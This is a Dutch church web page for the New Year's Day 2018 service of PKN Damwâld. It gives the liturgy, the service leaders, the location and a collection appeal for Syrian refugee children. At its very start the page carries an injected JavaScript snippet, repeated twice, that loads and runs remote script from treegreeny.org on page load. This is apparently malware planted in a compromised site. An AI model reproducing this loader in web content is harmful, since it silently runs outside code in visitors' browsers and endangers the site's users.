;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuwjaarsdag 1 januari 2018 - PKN Damwâld
maandag 1 januari 2018
10:00 uur
Gezamenlijke dienst met na afloop koffie in 't Skûlplak

Nieuwjaarsdag 1 januari 2018

Thema: Nieuwjaarsdienst

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Thema:Nieuwjaarsdienst
Mededeling:Gezamenlijke dienst met na afloop koffie in 't Skûlplak
Liturgie
Lied voor de dienst ELB 168:1,2,6,7
Welkom en mededelingen
Intochtslied Ps.63:1,2
Stilgebed, Aanvangswoorden en groet
Gebed
We lezen: Psalm 90:13-17
We zingen: Ps.90:8
Preek over Ps.90:14
We zingen: Gez.380:1,3,4,7
Lezing van de Geloofsbelijdenis .
We zingen: ELB 188
Gebeden
Collecte
Slotlied ELB 246:1,2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Kinderen in de knel

De oorlog in Syrië duurt al meer dan zes jaar. Kinderen groeien er op met de dagelijkse angst voor geweld of hebben op de vlucht alles wat vertrouwd was achter zich moeten laten. Sommige kinderen hebben zelfs nooit vrede gekend. Naast al het leed dat deze kinderen doormaken, staat ook hun toekomst op het spel. Door al het geweld zijn duizenden scholen verwoest en gesloten. In relatief veilige gebieden zijn klassen door de grote toestroom van vluchtelingen juist overvol en is lesgeven onmogelijk. Ouders maken zich grote zorgen over de toekomst van hun kinderen. Met het project "Geen verloren generatie" helpt de Raad van Kerken in het Midden Oosten (MECC) vluchtelingenkinderen in Syrië met onderwijs. MECC geeft bijles aan leerlingen met een onderwijsachterstand, helpt kinderen uit arme gezinnen met schooluniformen en boeken, knapt schoolgebouwen op, traint docenten om te midden van deze oorlog toch les te kunnen geven en ondersteunt ouders en kinderen met traumaverwerking. We mogen deze generatie van Syrische kinderen niet verloren laten gaan. Geef hen hoop, juist met Kerst, en geef aan de collecte.

Tweede collecte: Kerk
Uitganscollecte: Oudejaarscollecte